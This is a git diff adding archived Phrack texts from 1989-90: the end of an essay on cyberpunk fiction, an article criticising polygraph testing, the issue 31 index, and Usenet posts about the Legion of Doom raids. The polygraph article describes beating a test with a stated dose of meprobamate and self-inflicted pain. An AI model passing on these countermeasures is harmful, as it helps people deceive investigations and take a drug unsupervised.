+today:  One logged in and relied on some combination of keyboard and screen to
+interact with the machines.  In contrast, second generation cyberpunk offers
+more exotic and direct forms of interaction.  Vernor Vinge's "True Names" was
+the first novel to hint at something deeper.  In his story, and small band of
+hackers manage to transcend the limitations of keyboard and screen, and
+actually meet as presences in the network system.  Vinge's work found an
+enthusiastic audience (including Marvin Minsky who wrote the afterword), but
+never achieved the sort of circulation enjoyed by Brunner.  It would be another
+author, a virtual computer illiterate, who would put cyberpunk on the map.
+
+The author was William Gibson, who wrote "Neuromancer" in 1984 on a 1937 Hermes
+portable typewriter.  Gone are keyboards; Gibson's characters jack directly
+into Cyberspace, "a consensual hallucination experienced daily by billions of
+legitimate operators... a graphic representation of data abstracted from the
+banks of every computer in the human system.  Unthinkable complexity.  Lines of
+light ranged in the nonspace of the mind, clusters and constellations of
+data..."
+
+Just as Brunner offered us a future of the 1970s run riot, Gibson's
+"Neuromancer" serves up the 1980s taken to their cultural and technological
+extreme.  World power is in the hands of multinational "zaibatsu," battling for
+power much as mafia and yakuza gangs struggle for turf today.  It is a world of
+organ transplants, biological computers and artificial intelligences.  Like
+Brunner, it is a distopian vision of the future, but while Brunner evoked the
+hardness of technology, Gibson calls up the gritty decadence evoked in the
+movie "Bladerunner," or of the William Burroughs novel, "Naked Lunch" (alleged
+similarities between that novel and "Neuromancer" have triggered rumors that
+Gibson plagiarized Burroughs).
+
+Gibson's hero, Case, is a "deck cowboy," a freelance corporate thief-for-hire
+who projects his disembodied consciousness into the cyberspace matrix,
+penetrating corporate systems to steal data for his employers.  It is a world
+that Ivan Boesky would understand:  Corporate espionage and double-dealing has
+become so much the norm that Case's acts seem less illegal than profoundly
+ambiguous.
+
+This ambiguity offers an interesting counterpoint to current events.  Much of
+the controversy over the Cornell virus swirls around the legal and ethical
+ambiguity of Morris' act.  For every computer professional calling for Morris'
+head, another can be found praising him.  It is an ambiguity that makes the
+very meaning of the word "hacker" a subject of frequent debate.
+
+Morris' apparently innocent error in no way matches the actions of Gibson's
+characters, but a whole new generation of aspiring hackers may be learning
+their code of ethics from Gibson's novels.  "Neuromancer" won three of science
+fiction's most prestigious awards -- the Hugo, the Nebula and the Philip K.
+Dick Memorial Award -- and continues to be a best-seller today.  Unambiguously
+illegal and harmful acts of computer piracy such as those alleged against Kevin
+Mitnick (arrested after a long and aggressive penetration of DEC's computers)
+would fit right into the "Neuromancer" story line.
+
+"Neuromancer" is the first book in a trilogy.  In the second volume, "Count
+Zero" -- so-called after the code name of a character -- the cyberspace matrix
+becomes sentient.  Typical of Gibson's literary elegance, this becomes apparent
+through an artist's version of the Turing test.  Instead of holding an
+intelligent conversation with a human, a node of the matrix on an abandoned
+orbital factory begins making achingly beautiful and mysterious boxes -- a 21st
+Century version of the work of the late artist, Joseph Cornell.  These works of
+art begin appearing in the terrestrial marketplace, and a young woman art
+dealer is hired by an unknown patron to track down the source.  Her search
+intertwines with the fates of other characters, building to a conclusion equal
+to the vividness and suspense of "Neuromancer."  The third book, "Mona Lisa
+Overdrive" answers many of the questions left hanging in the first book and
+further completes the details of the world created by Gibson including an
+adoption by the network of the personae of the pantheon of voodoo gods and
+goddesses, worshipped by 21st Century Rastafarian hackers.
+
+Hard core science fiction fans are notorious for identifying with the worlds
+portrayed in their favorite books.  Visit any science fiction convention and
+you can encounter amidst the majority of quite normal participants, small
+minority of individuals who seem just a bit, well, strange.  The stereotypes of
+individuals living out science fiction fantasies in introverted solitude has
+more than a slight basis in fact.  Closet Dr. Whos or Warrior Monks from "Star
+Wars" are not uncommon in Silicon Valley; I was once startled to discover over
+lunch that a programmer holding a significant position in a prominent company
+considered herself to be a wizardess in the literal sense of the term.
+
+Identification with cyberpunk at this sort of level seems to be becoming more
+and more common.  Warrior Monks may have trouble conjuring up Imperial
+Stormtroopers to do battle with, but aspiring deck jockeys can log into a
+variety of computer systems as invited or (if they are good enough) uninvited
+guests.  One individual I spoke with explained that viruses held a special
+appeal to him because it offered a means of "leaving an active alter ego
+presence on the system even when I wasn't logged in."  In short, it was the
+first step toward experiencing cyberspace.
+
+Gibson apparently is leaving cyberpunk behind, but the number of books in the
+genre continues to grow.  Not mentioned here are a number of other authors such
+as Rudy Rucker (considered by many to be the father of cyberpunk) and Walter
+John Williams who offer similar visions of a future networked world inhabited
+by human/computer symbionts.  In addition, at least one magazine, "Reality
+Hackers" (formerly "High Frontiers Magazine" of drug fame) is exploring the
+same general territory with a Chinese menu offering of tongue-in-cheek
+paranoia, ambient music reviews, cyberdelia (contributor Timothy Leary's term)
+and new age philosophy.
+
+The growing body of material is by no means inspiration for every aspiring
+digital alchemist.  I am particularly struck by the "generation gap" in the
+computer community when it comes to "Neuromancer":  Virtually every teenage
+hacker I spoke with has the book, but almost none of my friends over 30 have
+picked it up.
+
+Similarly, not every cyberpunk fan is a potential network criminal; plenty of
+people read detective thrillers without indulging in the desire to rob banks.
+But there is little doubt that a small minority of computer artists are finding
+cyberpunk an important inspiration in their efforts to create an exceedingly
+strange computer reality.  Anyone seeking to understand how that reality is
+likely to come to pass would do well to pick up a cyberpunk novel or two.
+_______________________________________________________________________________
diff --git a/phrack30/9.txt b/phrack30/9.txt
new file mode 100644
index 0000000..d78f96d
--- /dev/null
+++ b/phrack30/9.txt
@@ -0,0 +1,230 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #9 of 12
+                      ___________________________________
+                     |                                   |
+                     |   The Truth About Lie Detectors   |
+                     |_______                     _______|
+                             |  by Razor's Edge  |
+                             |                   |
+                             | November 10, 1989 |
+                             |___________________|
+
+Americans love gadgets, so it is not hard to explain the popularity of the lie
+detector.  Many people believe in the validity of lie detectors because the
+instruments and printouts resemble those used by doctors and others who collect
+scientific data and because lie detectors are simple, convenient shortcuts to
+hard complicated decisions.  Polygraphy is fast becoming an American obsession
+-- an obsession, incidentally, not shared by the British or the Europeans or,
+as far as we know, the Russians.
+
+American industry's increasing dependence on the polygraph reflects an enormous
+faith in the rational processes of science.  Each of us can recall a time when
+our voices sounded funny as we told a lie.  Surely, if we can "hear" a lie,
+science can detect one.  It comes as a disturbing shock, therefore, to learn
+how fragile the polygraph's scientific foundations really are.
+
+The roots of the lie detector, more formally known as the polygraph, go back to
+the turn of the century, when infatuation with the newly discovered powers of
+electricity more than once overcame common sense.  But whereas electric hair
+restorers and high-voltage cancer cures have all but vanished, the polygraph
+persists and even flourishes.  According to the best estimates, over one
+million polygraph examinations are administered each year in the united States.
+They are used in criminal investigations, during government security checks,
+and increasingly by nervous employers -- particularly banks and stores.  In
+certain parts of the country, a woman must pass a lie detector test before the
+authorities will prosecute a rape.  In 1983 the television show Lie Detector
+added the dimension of home entertainment to polygraph tests.
+
+The National Security Agency (NSA) leads the roster of federal polygraph users;
+both it and the CIA rely heavily on polygraph testing for pre-employment and
+routine security screening.  The NSA reported giving nearly 10,000 tests in
+1982 (CIA numbers are classified).  Those who are labeled "deceptive" often
+lose their jobs, even if there is no actual evidence against them.  Moreover,
+the polygraph report may become a permanent part of an employee's records, and
+it will be extremely difficult to compel a correction.
+
+With the arrest in June 1985 of four Navy men on espionage charges, the issue
+of using polygraphs to uncover spies or ferret out dishonest job seekers has
+come to the forefront of the debate about what should be done to stem the loss
+of defense and company secrets and to dispel potential thieves in the
+workplace.
+
+Much the same issue is at the heart of the protracted wrangle between the
+Reagan Administration and Congress over plans for expanded government use of
+the polygraph.  An executive order issued on March 11, 1983, known as National
+Security Decision Directive 84, would have sanctioned for the first time
+"adverse consequences" for a federal employee who refuses to take a test when
+asked.  The directive authorized tests to investigate candidates for certain
+security clearances and to ask any federal employee about leaks of classified
+information.  (This directive was issued shortly after Reagan's comment about
+being "up to my keister" in press leads.)  Almost simultaneously the Department
+of Defense (DOD) released a draft regulation that authorized use of the
+polygraph to screen employees who take on sensitive intelligence assignments;
+it, too, prescribed adverse consequences for refusal.
+
+Critics of the polygraph maintain that its use represents an invasion of
+privacy, especially when the coercive power of the government or an employer is
+behind the application.  It is hard for a job applicant to say no when a
+prospective employer asks him or her to take a polygraph test; once hooked up
+to the machine, the applicant may face questions not only about past criminal
+activity but also about matters that an employer may have no business intruding
+upon, such as sexual practices or gambling -- questions asked ostensibly to
+assess the applicant's "character."  As a result of such abuses, nineteen
+states and the District of Columbia have made it illegal for an organization to
+ask its employees to take polygraph examinations.
+
+A question more basic than whether the polygraph is an unacceptable invasion of
+privacy is, of course, whether it works.  Seeking an answer in the scientific
+literature can be a bewildering experience.  A report by the Office of
+Technology Assessment (OTA), commissioned in 1983 by Brooks's Committee on
+Government Operations, summed up the problem by citing twenty-four studies that
+found correct detection of guilt ranging from 35% to 100%.
+
+Polygraph theory thrives on a sort of Pinocchio vision of lying, in which
+physiological reactions -- changes in blood pressure or rate of breathing or
+sweating of the palms -- elicited by a set of questions will reliably betray
+falsehood.  Lying, goes the rationale, is deliberate, and the knowledge and
+effort associated with it will make a person upset enough to display a physical
+reaction like a speedup of the heartbeat.  The variables measured usually
+include the galvanic skin response (GSR), blood pressure, abdominal
+respiration, and thoracic respiration.  The GSR is measured by fingertip
+electrodes that produce changes in the electrical resistance in the palms when
+they are sweating.  The blood pressure and pulse are monitored through a system
+that uses a sphygmomanometer cuff, which is usually attached to the biceps
+(this is similar to the way doctors measure blood pressure).  There is no
+"specific lie response."  The polygraph merely records general emotional
+arousal.  It does not distinguish anxiety or indignation from guilt.  The real
+"lie detector" is the operator, who interprets the various body responses on
+the machine's output.
+
+Polygraphers claim that it is the form and mix of questions that are the keys
+to their success.  The standard format, known as the Control Question Test,
+involves interspersing "relevant" questions with "control" questions.  Relevant
+questions relate directly to the critical matter:  "Did you participate in the
+robbery of the First National Bank on September 11, 1981?"  Control questions,
+on the other hand, are less precise:  "In the last twenty years, have you ever
+taken something that did not belong to you?"
+
+In the pretest interview, the polygrapher reviews all the questions and frames
+the control questions to produce "no" answers.  It is in this crucial pretest
+phase that the polygrapher's deception comes into play, for he wants the
+innocent subject to dissemble while answering the control questions during the
+actual test.
+
+The assumption underlying the Control Question Test is that the truthful
+subject will display a stronger physiological reaction to the control
+questions, whereas a deceptive subject will react more strongly to the relevant
+questions.  That is the heart of it.  Modern lie detection relies on nothing
+more than subtle psychological techniques, crude physiological indicators, and
+skilled questioning and interpretation of the results.
+
+Critics claim that polygraphy fails to take the complexities of lying into
+account.  For some people lying can be satisfying, fulfilling, exciting, and
+even humorous, depending on their reasons for lying.  Other people feel little
+or no emotion when lying.  Still others believe their lies and think they are
+telling the truth when they are not.  Moreover, the theory holds that deception
+produces distinctive physiological changes that characterize lying and only
+lying.  This notion has no empirical support.  Quite the contrary:  Lying
+produces no known distinctive pattern of physiological activity.
+
+Undeniably, when being dishonest, people can feel great turmoil and a polygraph
+can measure this turmoil.  But when apprehensive about being interrogated, they
+can give a similar emotional reaction:  When they think they are losing the
+chance for job openings or their jobs are on the line, when they reflect on the
+judgements that could be made about their answers, or, for that matter, when
+they are angry, puzzled, or even amused by the impertinent probing of a total
+stranger.  Some control questions may make a person appear guilty.  Such
+questions may force a subject into a minor lie or ask about an invented crime
+that nonetheless makes the subject nervous.
+
+Lie detectors are especially unreliable for truthful people.  Many more
+innocent people test as "deceptive" than guilty people test as "innocent."
+Those who run a special risk include people who get upset if someone accuses
+them of something they didn't do, people with short tempers, people who tend to
+feel guilty anyway, and people not accustomed to having their word questioned.
+All of these feelings can change heart rate, breathing, and perspiration and
+their heightened feelings are easily confused with guilt.
+
+It has also been shown that polygraphs are easily manipulated.  Four hundred
+milligrams of the tranquilizer meprobamate taken an hour or two before a
+polygraph session can make it virtually impossible to spot a liar by his
+physiological responses.  In fact, some researchers even argue that an examinee
+can use simple countermeasures, such as biting one's tongue, gouging oneself
+with a fingernail, or stepping on a nail concealed in a shoe, to fake a strong
+reaction to the control questions, thus "beating" the test.  According to one
+researcher, one prison inmate, who became the jail-house polygraph expert after
+studying the literature, trained twenty-seven fellow inmates in the seat
+techniques; twenty-three beat the polygraph tests used tons investigate
+violations of prison rules.  However, do not try sighing, coughing, or
+clenching your fist or arm.  Polygraphers usually are suspicious of those
+techniques and may label you "deceptive" for that reason alone.
+
+It should be obvious that the interpretation of the results of any polygraph
+test will certainly be very difficult.  Also, not all responses on the machine
+will agree.  What are the present qualifications for a polygrapher?  Most of
+the twenty-five or more schools that train examiners provide only an eight-week
+course of instruction and require two years of college for admission.  This is
+about one-sixth the study time of the average barber college.  Perhaps as many
+as a dozendy time of contemporary polygraphers do hold Ph.D's, but the vast
+majority of the 4,000 to 8,000 practicing examiners had no simple significant
+training in physiology or in psychology, even though lie detection demands
+extremely subtle and difficult psychophysiological interpretations.  There are
+no licensing standards for polygraph operators, and, with so many poorly, who
+trained operators, thousands of tests are conducted hastily and haphazardly,
+resulting in highly questionable accuracy.  For many innocent people, their
+judge and jury are these unskilled operators.
+
+Honesty is also difficult to predict because it tends to be situation-
+specific.  Therefore, it is more dependent on motivation and opportunity than
+on some personality trait.  As Bertrand Russell once said, "Virtue is dictated
+by results of circumstance."
+
+Proponents of the polygraph sometimes cite "correct guilty detections":  The
+percentage of guilty subjects who are caught by the polygraph.  This figure can
+be very impressive:  In one study that does not suffer from the failings
+already mentioned, it was 98% correct.  But the same study found that 55% of
+innocent subjects were also diagnosed as "deceptive."  The handful of studies
+that used a truly random selection of cases and scored them blind produced
+similar results:  Overall, 83% of guilty subjects were diagnosed as
+"deceptive," as were 43% of innocent subjects.  It's no trick to push the rate
+of correct guilty detections to 100% -- just call everyone "deceptive."  You
+don't even need a machine to do that!
+
+Nature published its conclusions last year.  Their aggregated findings were
+based on the polygraph charts of 207 criminal suspects, which 14 polygraphers
+scored independently.  On the average, they erroneously diagnosed 43% of
+innocent suspects as deceptive. Such errors, called false positives, ranged as
+high as 50%.  The corresponding errors of deceptive persons "passing the test,"
+or false negatives, were as high as 36%.
+
+The accuracy rates of "failed" and "passed" depend, of course, on the
+proportion of dishonest persons in the group tested.  Thus, if 800 of 1,000
+persons tested are truthful, a test that is 72% accurate overall will accuse
+144 liars and 224 truthful persons.  This is not an impressive accuracy record.
+
+These numbers suggest that the polygraph test is biased against innocent
+people.  The problem is accentuated when the test is used in the screening
+situations envisioned in the Reagan Administration proposals (and already
+established at the NSA and the CIA).  Everyone is tested, but presumably only a
+very small proportion has done anything wrong.  If we assume that one employee
+in a hundred is a spy (probably a gross overestimate), and if we use the 83%
+correct-guilty-detection rate, we find that 51 innocent persons will flunk the
+polygraph test for every real spy who flunks.  Any test, whether it is for
+truth or for cancer, has to be extremely accurate to detect a rare phenomenon
+without setting off a lot of false alarms in the process.  Even if the test
+were 99% accurate for both guilty and innocent detections, one innocent person
+would be falsely branded for each spy caught.  Because of this "case rate"
+problem, the FBI forbids the use of polygraph dragnets:  The tests can be used
+only after an initial investigation has narrowed the field of suspects.
+
+Given all the doubts about their validity, why does the government persist in
+using polygraph tests?  Some clues are found in the DOD 1983 report on
+polygraph testing -- even in its title, "The Accuracy and Utility of Polygraph
+Testing" which suggests that accuracy and utility are two different things.
+The most that report concludes about accuracy is that it is "significantly
+above chance."  Utility, however, is quite another matter.  Perhaps the most
+telling statement about lie detectors comes from former president Nixon, who
+declared on one of the White House tapes, "I don't know anything about lie
+detectors other than they scare the hell out of people."
+_______________________________________________________________________________
diff --git a/phrack31/1.txt b/phrack31/1.txt
new file mode 100644
index 0000000..2bb7449
--- /dev/null
+++ b/phrack31/1.txt
@@ -0,0 +1,47 @@
+                               ==Phrack Inc.==
+                 Volume Three, Issue Thirty-one, Phile #1 of 9
+                              Issue XXXI Index
+                              ________________
+                              P H R A C K   3 1
+                                  05/28\90
+                              ________________
+
+       Welcome to a new begining of Phrack Inc.  Yes, Phrack is not dead.
+     On the contrary, Phrack will and can't ever die.  Phrack is more than just
+a technical newsletter  that comes out every now and then, it's a symbol of our
+hacking history.   Whether,  it's  called Phrack  or some  other  name, it will
+always be published for the same reasons:
+   1. Inform it's readers of current events and other related items
+             of hacker interest.
+   2. Educate it's readers on all topics of shared common interests
+             that may benefit the hacker at his hobby.
+   3. Remain an authority in the hacking world and an observer in the
+             ever growing technical community.
+   4. Be open to anyone who wishes to submit an article for publication
+             that will further the hacker's education.
+    Many things have happened since the last publication of Phrack.  We at
+Phrack inc. will try to "shed some light" on the matters that have occured. And
+as for all these ridiculous rumors that have been spreading, let us speak the
+truth and be heard.
+    Hah.  No my friends, Phrack is not dead..
+    --DH (Editor)
+     Note:  If you wish to contact Phrack inc. to submit a file, ask around for
+a Phrack inc.  distribution site  --  Then Email "Phrack inc." and be very very
+patient.
+     Note:  Special thanks to T C, Phz, and others for wide
+area distribution.
+_______________________________________________________________________________
+
+Phrack XXXI Table of Contents
+=============================
+31-1. Introduction to Phrack 31 by DH          (2K)
+31-2. Phrack Pro-Phile of Markus Hess by PHz            (6K)
+31-3. Hacking Rolm's CBXII by DH               (15K)
+31-4. TAMS & Telenet Security by Phreak_Accident        (7K)
+31-5. The history of The Legion Of Doom                 (10K)
+31-6. Cosmos Overview by EBA                  (52k)
+31-7. Tymnet Security Memo by Anonymous                 (9K)
+31-8. PWN/Part01 by Phreak_Accident                     (13K)
+31-9. PWN/Part02 by Phreak_Accident                     (17K)
+31-10. PWN/Part03 by Phreak_Accident                    (40K)
+_______________________________________________________________________________
diff --git a/phrack31/10.txt b/phrack31/10.txt
new file mode 100644
index 0000000..3a1ae01
--- /dev/null
+++ b/phrack31/10.txt
@@ -0,0 +1,708 @@
+                              ==Phrack Inc.==
+               Volume Three, Issue Thirty-one, Phile #10 of 10
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN             Phrack World News               PWN
+             PWN           Issue XXXI, Part Three            PWN
+             PWN        Compiled by Phreak_Accident          PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Comp.dcom.telecom
+-----------------
+     The following is excerpts from comp.dcom.telecom regard the now "Infamous"
+Legion Of Doom busts.  I know most of you have seen some of these
+somewhere-sometime, but I thought I would try to get these out for those
+unfortunate souls that don't have Usenet access.
+     I know there have been many controversies over the following material and
+the busts as a whole -- Henceforth, Phrack Inc. will not comment on any of such
+busts.  Mainly because we don't want to jeopardize any current investigations
+concerning LOD and others.  Leave it alone.  It's old news.  Let this sum it up
+for you guys and then forget about it.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Newsgroups: comp.dcom.telecom
+Subject: CBS News Special Report - "The Busting of The Mentor"
+Message-ID: <4747@accuvax.nwu.edu>
+Date: 5 Mar 90 06:11:49 GMT
+Sender: news@accuvax.nwu.edu
+Organization: Capital Area Central Texas Unix Society, Austin, TX
+Lines: 37
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Volume 10, Issue 145, Message 6 of 6
+...I've just gotten a new update on the Mentor's recent apprehension by
+the Feds. Thought you might like to hear something as close to as direct
+from the Mentor as possible under the circumstances.
+   From: Daneel Olivaw #96 @5283
+   Date: Sun Mar 04 19:55:28 1990
+I'll have to play the Mentor for now (with permission granted).
+If you haven't heard the rumors, here is the truth.
+The Mentor was awakened at 6:30am on Thursday (3/1/90) with the gun of
+a Secret Service agent pointed at his head.  The SS proceded to search
+and seize for the next 4 1/2 hours.  Things taken include an AT with
+80mb HD, HP LaserJet II, various documents, and other thing.  They
+then proceded to raid his office at work, and sieze the computer and
+laser printer there.  Lost in the shuffle was a complete novel (being
+written and due in 2 weeks), and various other things.
+Across town: Those of you who know Erik Bloodaxe, he was also
+awakened, and his house searched.
+Neither have been charged with anything, but they expect to at least
+be called as witnesses at the case of the Phrack Boys (Knight
+Lightning and Tarren King) in Chicago April 15.
+Apparently, they did a shoddy job, as they tagged a book that Mentor
+had borrowed from me (Quarterman's "The Matrix"), and then forgot to
+take it, oh well....
+It ain't lookin so lovely.  Also the UT computer systes are under
+*VERY* close watch, as they were/are being hacked on by hackers around
+the world, including some in Australia, and England.
+                                                        OM
+From: cosell@bbn.com (Bernie Cosell)
+Newsgroups: comp.dcom.telecom
+Subject: Keeping Copies of Illegal Things (was Re: Jolnet, Again)
+Message-ID: <4725@accuvax.nwu.edu>
+Date: 4 Mar 90 04:36:50 GMT
+Sender: news@accuvax.nwu.edu
+Organization: TELECOM Digest
+Lines: 52
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Volume 10, Issue 143, Message 3 of 8
+}TELECOM Digest     Sat, 3 Mar 90 20:45:00 CST    Special: Jolnet, Again
+This isn't misc.legal, and this isn't the time to be excessively picky
+and critical, but:
+}Here is how he told the tale of the '911 software':
+}The software showed up on his system one day, almost two years ago. It
+}came to him from netsys, where Len Rose was the sysadmin. According to
+}Andrews, when he saw this file, and realized what it was, he knew the
+}thing to do was to 'get it to the proper authorities as soon as
+}possible',...
+}ME> "After you passed it along to Boykin, did you then destroy the
+}file and get it off your site?"
+}RA> "Well, no... I kept a copy also."
+It strikes me that this is a KEY faux pas, regardless of good
+intentions or not.
+}But then, said Andrews, a funny thing happened several months later.
+}The folks at AT&T, instead of being grateful for the return of their
+}software came back to Andrews to (in his words) 'ask for it again.'
+}Somehow, they either never got it the first time; got it but suspected
+}there were still copies of it out; or were just plain confused.
+Just so, and if RA *supplied* another copy, I suspect they'd interpret
+that as pretty convincing evidence that it WAS further distributed,
+and with RA's knowledge.  I know that they didn't actually contact him
+and ask/tell him to expunge all copies of the stuff, but his actions
+clearly demonstrated his knowledge of just what it was he was messing
+with, and I think they could easily show that he incurred an
+obligation to act prudently with it, or else [just guessing now] he
+could be liable to being an accessory after the fact.
+}So he was contacted by the feds about a year ago, and it was at that
+}point he decided it was in his best interest to cooperate with any
+}investigation going on.
+Perhaps his sudden cooperation was less out of pangs of conscience
+that it might have appeared...  [not to besmirch his motives here,
+only to point out that a call from the FBI pointing out that while you
+may not have really DONE anything, your actions _could_ end up landing
+you in court with some serious potential badness going down (and none
+of this untested cheesiness about the the technicalities of bbs's and
+such...  nice mainstream legal liability), could be pretty persuasive
+at converting a concerned, but out-of-the-loop, citizen into an active
+helper].
+  /Bernie\
+From: dattier@chinet.chi.il.us (David Tamkin)
+Newsgroups: comp.dcom.telecom
+Subject: Seizures Spreading
+Message-ID: <4724@accuvax.nwu.edu>
+Date: 4 Mar 90 05:55:20 GMT
+Sender: news@accuvax.nwu.edu
+Organization: TELECOM Digest
+Lines: 15
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Volume 10, Issue 143, Message 2 of 8
+News is that Illuminati BBS, a system run by a company named Steve
+Jackson Games somewhere in Texas, was also shut down and its equipment
+seized by the federal government because two suspected Legion of Doom
+members were among its users.
+[Moderator's Note: And I suspect the raids will continue during the
+next week or two. I wonder which sites will be next?  Each place they
+raid, the local crackers point their fingers at each other like
+naughty children, and to make themselves seem like the good guys they
+say, "Have you talked to so-and-so yet?". Let's see now: netsys,
+jolnet, attctc, illuminati, (your name here?)... Apparently even
+getting rid of incriminating evidence won't work any longer, if
+someone upstream of you tattled.  PT]
+From: mosley@peyote.cactus.org (Bob Mosley III)
+Newsgroups: comp.dcom.telecom
+Subject: Austin, TX BBS Shut Down From Joinet Bust Fallout
+Message-ID: <4723@accuvax.nwu.edu>
+Date: 4 Mar 90 17:22:26 GMT
+Sender: news@accuvax.nwu.edu
+Organization: Capital Area Central Texas Unix Society, Austin, TX
+Lines: 28
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Volume 10, Issue 143, Message 1 of 8
+This hit most BBS's in the Austin area on Thursday. It's believed
+the bust came down Wednesday morning. In a nutshell, here's what
+happened:
+Wednesday morning, Feb. 28, the offices of Steve Jackson Games, inc.,
+were raided by FBI and Secret Service officials. The establishment was
+shit down, and all computer systems, including the Illuminati BBS,
+were confiscated.
+At that time, a 'retired' member of the LoD, who was identified as
+'The Mentor' was arrested. The charges reportedly are related to the
+recent 911 bust that has shut down joinet and attatc (or whatever
+Killerused to be called). His home system was confiscated, complete
+with an entire collection of "Phrack" issues and related paraphanalia.
+As of this writing, the Mentor is reportedly out on bail, sans system
+and network connection. The Illuminati BBS is still down, although SJ
+Games is back in operation, and no charges have been filed against any
+of the employees other than The Mentor. The systems owned by SJ Games
+have not been returned as of this writing.
+Finally, rumors were trickling in early this morning (Saturday, 3/4)
+that two BBS's in Dallas, three in Houston, and one in San Antonio
+were busted by the same authorites in relation to the same case.
+[in light of the Mentor's posted defense of the LoD, I kinda thought
+you'd like to see this one! - OM]
+From: telecom@eecs.nwu.edu (TELECOM Moderator)
+Newsgroups: comp.dcom.telecom
+Subject: Jolnet, Again
+Message-ID: <4701@accuvax.nwu.edu>
+Date: 4 Mar 90 02:45:00 GMT
+Sender: news@accuvax.nwu.edu
+Organization: TELECOM Digest
+Lines: 350
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Special: Jolnet, Again
+TELECOM Digest     Sat, 3 Mar 90 20:45:00 CST    Special: Jolnet, Again
+Today's Topics:                             Moderator: Patrick Townson
+    Re: AT&T Sourcecode: Poison! (Chip Rosenthal)
+    Jolnet Seizure (Mike Riddle)
+    Article Regarding JOLNET/e911/LoD/Phrack (Ben Rooney)
+    A Conversation With Rich Andrews (TELECOM Moderator)
+    Killer/attctc Permanently Down (Charlie Boykin)
+----------------------------------------------------------------------
+From: Chip Rosenthal <chip@chinacat.lonestar.org>
+Subject: Re: AT&T Sourcecode: Poison!
+Date: 3 Mar 90 00:00:00 GMT
+Organization: Unicom Systems Development, Austin (yay!)
+[Moderator's Note: Original date of 2/25 changed to prevent premature
+expiration.  PT]
+You've got a lot of nerve, Patrick.
+telecom@eecs.nwu.edu (TELECOM Moderator) writes:
+>We're told by a deep-throat type that AT&T is on the war path about
+>their software [...] Like jolnet, netsys went down abruptly, with
+>*everything* confiscated [...] Now comes news that attcdc [sic], formerly
+>known as killer went off line in a hurry.....
+Yessir, after all your complaints about that about anonymous Legion of
+Doom message, this is a really crummy thing to post.  Based upon
+unattributed conversations, you imply that Len Rose and Charlie Boykin
+were involved in wrongdoing which lead to the shutdown of their
+systems.
+I don't know Len personally, but have had uucp connections with him in
+the past.  Charlie, on the other hand, I do know personally.  He is
+very well regarded in the Dallas/Fort Worth area, and was voted "1989
+DFW Administrator of the Year" by the DFW lunch-bunch...errr....DFW
+Association of Unix System Administrators.
+You have cast some crummy aspersions towards these guys.  Since I know
+them, I will wait for the facts to come in.  Others who don't know
+them could very well jump to conclusions on the basis of this posting.
+Was this message really called for?
+Chip Rosenthal                            |  Yes, you're a happy man and you're
+chip@chinacat.Lonestar.ORG                |  a lucky man, but are you a smart
+Unicom Systems Development, 512-482-8260  |  man?  -David Bromberg
+------------------------------
+Date: Wed, 28 Feb 90 21:38:39 EST
+From: Mike Riddle <Mike.Riddle@p6.f666.n5010.z1.fidonet.org>
+Subject: Jolnet Seizure
+Reply-to: Mike.Riddle@p6.f666.n285.z1.fidonet.org
+Organization: DRBBS Technical BBS, Omaha, Ne. 402-896-3537
+Has anyone tried a novel legal approach to the case of equipment
+seizure as "evidence"?  As I remember the Electronic Communications
+Privacy Act, it contains specific procedures for authorities to obtain
+copies/listings of data on a system (which system may have been used
+for illegal purposes, but whose operator is not at the moment
+charged).  From this I think a creative attorney could construct an
+argument that the national policy was not to seize equipment, merely
+to obtain all the information contained therein.  After all, it's the
+data that caused any harm.
+Also, the Federal Rules of Evidence, and most state rules, provide
+that computer generated copies are "originals" for evidentiary
+purposes.
+I hope that someone close enough to the scene can keep us informed
+about what is happening on this one.
+{standard disclaimer goes here--don't pay any attention to me!}
+   --- Ybbat (DRBBS) 8.9 v. 3.07 r.1
+  * Origin: [1:285/666.6@fidonet] The Inns of Court, Papillion, NE  (285/666.6)
+   --- Through FidoNet gateway node 1:16/390
+   Mike.Riddle@p6.f666.n5010.z1.fidonet.org
+------------------------------
+From: brooney@sirius.uvic.ca
+Date:  3 Mar 90  2:36 -0800
+Subject: Article Regarding JOLNET/e911/LoD/Phrack
+The following is an article I received five days ago which contains, to my
+knowledge, information as yet unpublished in comp.dcom.telecom regarding the
+ongoing JOLNET/e911/LoD discussion.  It was printed in a weekly magazine
+with a publishing date of Feb. 27 but other than that I have no exact idea
+of when the events mentioned herein took place.
+ - Ben Rooney
+MISSOURI STUDENT PLEADS INNOCENT TO 911 CHARGES
+ [Knight Lightning], a 19-year-old University of Missouri student, has
+pleaded not guilty to federal allegations that he invaded the 911
+emergency phone network for 9 states.
+ As reported earlier, he was indicted this month along with [The Prophet],
+20, of Decatur, Ga.  Both are charged with interstate
+transportation of stolen property, wire fraud, and violations of the
+federal Computer Fraud and Abuse Act of 1986.
+ Prosecutors contend the two used computers to enter the 911 system of
+Atlanta's Bell South, then copied the program that controls and
+maintains the system.  The stolen material later allegedly was
+published on a computer bulletin board system operating in the Chicago
+suburb of Lockport.  Authorities contend Neidorf edited the data for
+an electronic publication known as "Phrack."
+ According to Associated Press writer Sarah Nordgren, in a recent
+hearing on the case Assistant U.S. Attorney William Cook was granted a
+motion to prevent the 911 program from becoming part of the public
+record during the trial.  U.S. District Judge Nicholas Bua set April
+16 for a trial.
+ The 911 system in question controls emergency calls to police, fire,
+ambulance and emergency services in cities in Alabama, Mississippi,
+Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South
+Carolina and Florida.
